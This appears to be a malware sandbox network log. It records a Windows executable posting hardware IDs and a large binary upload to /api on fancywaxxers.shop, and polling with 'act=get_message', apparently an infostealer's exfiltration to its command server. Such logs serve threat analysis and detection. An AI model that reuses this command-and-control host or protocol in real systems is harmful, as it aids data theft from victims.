4	192.168.2.4	49740	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:24 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JVBF1O705HQY71AC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20431 Host: fancywaxxers.shop
2024-12-30 14:53:24 UTC	15331	OUT	Data Raw: 2d 2d 4a 56 42 46 31 4f 37 30 35 48 51 59 37 31 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 39 31 45 45 36 32 39 32 44 38 36 41 34 41 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4a 56 42 46 31 4f 37 30 35 48 51 59 37 31 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 56 42 46 31 4f 37 30 35 48 51 59 37 31 41 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --JVBF1O705HQY71ACContent-Disposition: form-data; name="hwid"4691EE6292D86A4A20A4C476FD51BCB1--JVBF1O705HQY71ACContent-Disposition: form-data; name="pid"3--JVBF1O705HQY71ACContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-30 14:53:24 UTC	5100	OUT	Data Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-30 14:53:25 UTC	1135	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l0v00n76d45l6hec7lam0b7pmf; expires=Fri, 25 Apr 2025 08:40:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Pq5duKlkipsxuuduywa4KVkfQEmYTEZh9DqPWYbGfZOYcvSXxIZu9tWPc0Nk4q4Aef%2FqDz%2FjCoVp3WHPQyaMkzhu0Bl4Fh%2BXu%2FlUjeb7WNnbkPKRMXR2NICmbzTjCCuDIIz8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dbf58b0bde9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1629&rtt_var=615&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21392&delivery_rate=1792510&cwnd=209&unsent_bytes=0&cid=6ac373fcfb92e367&ts=645&x=0"
2024-12-30 14:53:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 14:53:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:26 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=B01W1TA7OV50NCT1BT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1278 Host: fancywaxxers.shop
2024-12-30 14:53:26 UTC	1278	OUT	Data Raw: 2d 2d 42 30 31 57 31 54 41 37 4f 56 35 30 4e 43 54 31 42 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 39 31 45 45 36 32 39 32 44 38 36 41 34 41 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 42 30 31 57 31 54 41 37 4f 56 35 30 4e 43 54 31 42 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 30 31 57 31 54 41 37 4f 56 35 30 4e 43 54 31 42 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --B01W1TA7OV50NCT1BTContent-Disposition: form-data; name="hwid"4691EE6292D86A4A20A4C476FD51BCB1--B01W1TA7OV50NCT1BTContent-Disposition: form-data; name="pid"1--B01W1TA7OV50NCT1BTContent-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-30 14:53:27 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qt05k1vgs2hi3lofdarutg3esn; expires=Fri, 25 Apr 2025 08:40:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=su0ZP%2BToDfff9vb1RUcCW7SHF53IZExOF4p2y5KdqDdLWUNoDGv%2B5%2F5HY0mlT56hYCxBF8Jm1IW4h51yf2tE5X3npjmO54pLY%2BzsAsnYIvy8yI%2BPSOw1uTt4tNihrXBNV2D7mA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dc026ca142c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=875&sent=5&recv=8&lost=0&retrans=1&sent_bytes=4226&recv_bytes=2196&delivery_rate=316977&cwnd=212&unsent_bytes=0&cid=f832799e67fda03e&ts=473&x=0"
2024-12-30 14:53:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 14:53:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:28 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H0ECKCL73YMNFJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585761 Host: fancywaxxers.shop
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 2d 2d 48 30 45 43 4b 43 4c 37 33 59 4d 4e 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 36 39 31 45 45 36 32 39 32 44 38 36 41 34 41 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 48 30 45 43 4b 43 4c 37 33 59 4d 4e 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 30 45 43 4b 43 4c 37 33 59 4d 4e 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 30 Data Ascii: --H0ECKCL73YMNFJContent-Disposition: form-data; name="hwid"4691EE6292D86A4A20A4C476FD51BCB1--H0ECKCL73YMNFJContent-Disposition: form-data; name="pid"1--H0ECKCL73YMNFJContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--H0
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 35 a5 2c b0 d3 Data Ascii: bP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u5,
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 fb 4e 5d 03 66 Data Ascii: 'T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJGN]f
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 53 10 21 f7 69 Data Ascii: _wN0 E0VGo$?zRf@9#w_56~s9UKBd_QgJd\/~#}'[lxmUVw_?U-]%B6RY"N<Leo7"pNBNry<A9@O]>PeS!i
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 78 18 10 2f 10 Data Ascii: 0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:x/
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 2e 9f aa 43 95 7e 2b be e8 df 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91 53 95 33 d5 c3 07 5e e9 Data Ascii: .C~+nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{HS3^
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 1f 4e 1b 43 34 05 db ec 33 97 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5 c7 47 3f fe 76 3c 5d 00 Data Ascii: NC43>]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK \|/3-h3VG?v<]
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 75 78 f0 1d b7 0d a5 35 1f 94 ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7 aa f8 82 cf f4 04 34 dd Data Ascii: ux5+Q9\|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[4
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 88 cd ff c9 28 24 97 a1 82 2e 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27 f8 ad 3f 86 d1 ba 24 4c Data Ascii: ($.H3uFW/%a0zuS-.Gy3!ap5mYuP.L&jMO~$-<_~@>&EWE+8Z5B_rO;o0xugvPzls?RuVnoS=R<2p#'?$L
2024-12-30 14:53:28 UTC	15331	OUT	Data Raw: 91 a0 d6 fe ba a6 3d 74 e0 2a 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d d5 37 53 9a f6 b1 2f e0 Data Ascii: =t*+_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL\|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-7S/
2024-12-30 14:53:32 UTC	1145	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9t0fd1drlg2gid4j8gsuqi3u58; expires=Fri, 25 Apr 2025 08:40:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0AuWhDwWuVlvS%2Fal0iEl%2BZ21u6XoJu%2FpyANH9%2F7RGeMQEMlCRsdZMwKJCiyqqqaNx%2BX2FGdDoFz4EulyPJYK%2FVqCeu7gi4lWuCcwWi0moq6Mt0S1TUE%2FRtfHGE3yvd9WGlNsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dc0b9f5e72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1891&rtt_var=714&sent=301&recv=606&lost=0&retrans=0&sent_bytes=2843&recv_bytes=588349&delivery_rate=1526398&cwnd=212&unsent_bytes=0&cid=bbd6e53049b626fa&ts=4380&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.96.1	443	6256	C:\Users\user\Desktop\UmotQ1qjLq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:33 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: fancywaxxers.shop
2024-12-30 14:53:33 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 34 36 39 31 45 45 36 32 39 32 44 38 36 41 34 41 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=4691EE6292D86A4A20A4C476FD51BCB1
2024-12-30 14:53:33 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 14:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=70vn1ugr145nk166rah4k1gdtc; expires=Fri, 25 Apr 2025 08:40:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FEQXRhnODAeYKcPne2dVHxJNkY%2BcZ05Uckksn1KHE4vPcF7L8RJOzQ%2BzbCYCNN5Xdk1TQ2ozIqohKu7dSnjvNQ8zk7QPaNyEm3hn%2BqaSisdLnU2qTub3KvDx9STwesJwsx5W5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa2dc2a4ded72a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2022&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=989&delivery_rate=1407907&cwnd=212&unsent_bytes=0&cid=b58288bf47ba8f51&ts=486&x=0"
2024-12-30 14:53:33 UTC	210	IN	Data Raw: 63 63 0d 0a 7a 2f 37 4a 74 75 52 4b 57 4f 7a 4d 48 6c 49 77 7a 35 62 41 52 73 79 56 70 64 4f 38 46 37 61 2f 42 70 45 79 62 38 4f 67 4b 62 53 55 68 65 76 44 78 6e 42 36 68 4c 68 71 49 67 71 54 75 5a 78 70 2f 61 32 51 2f 59 34 6d 67 35 45 33 6f 41 46 42 38 70 5a 31 6d 36 43 59 72 2b 72 4c 4c 6a 32 4b 34 6e 73 71 56 65 32 36 34 69 43 34 74 35 2f 6a 6b 44 58 54 6e 54 79 67 54 30 4f 34 67 6c 79 57 39 64 79 68 77 70 41 36 59 72 44 6a 51 6e 30 42 39 36 50 75 64 50 32 67 69 2b 4b 4e 4a 4a 69 4f 4d 4d 30 64 41 4b 58 47 64 5a 75 72 6d 36 2b 59 67 54 49 39 7a 75 41 38 4e 45 54 74 72 50 42 71 37 76 43 48 36 59 78 71 36 77 3d 3d 0d 0a Data Ascii: 